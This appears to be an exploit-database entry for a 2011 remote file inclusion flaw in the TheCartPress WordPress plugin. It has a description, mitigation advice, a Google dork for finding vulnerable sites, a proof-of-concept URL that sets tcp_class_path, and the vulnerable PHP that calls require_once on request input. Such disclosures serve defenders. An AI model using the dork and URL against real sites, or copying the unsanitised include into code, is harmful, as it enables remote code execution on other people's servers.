header-logo
Suggest Exploit
vendor:
Thecartpress Wordpress plugin
by:
Ben Schmidt
9.3
CVSS
HIGH
Remote File Inclusion (RFI)
98
CWE
Product Name: Thecartpress Wordpress plugin
Affected Version From: 1.1.2001
Affected Version To: 1.1.2001
Patch Exists: YES
Related CWE: N/A
CPE: a:thecartpress:thecartpress
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Wordpress
2011

Thecartpress WordPress plugin RFI

Thecartpress Wordpress plugin is vulnerable to Remote File Inclusion (RFI) due to insufficient sanitization of user-supplied input. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary code on the server, resulting in a complete compromise of the system.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized. Additionally, the application should be configured to only allow requests from trusted sources.
Source

Exploit-DB raw data:

# Exploit Title: Thecartpress Wordpress plugin RFI
# Google Dork: inurl:wp-content/plugins/thecartpress
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/thecartpress/download/
# Version: 1.1.1 (tested)

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=RFI

---
Vulnerable Code
---
if ( isset( $_REQUEST['tcp_save_fields'] ) ) {
	$path = $_REQUEST['tcp_class_path'];
	$class_name = $_REQUEST['tcp_class_name'];
	require_once( $path );

Navigation

Suggest Exploit

Services By CQR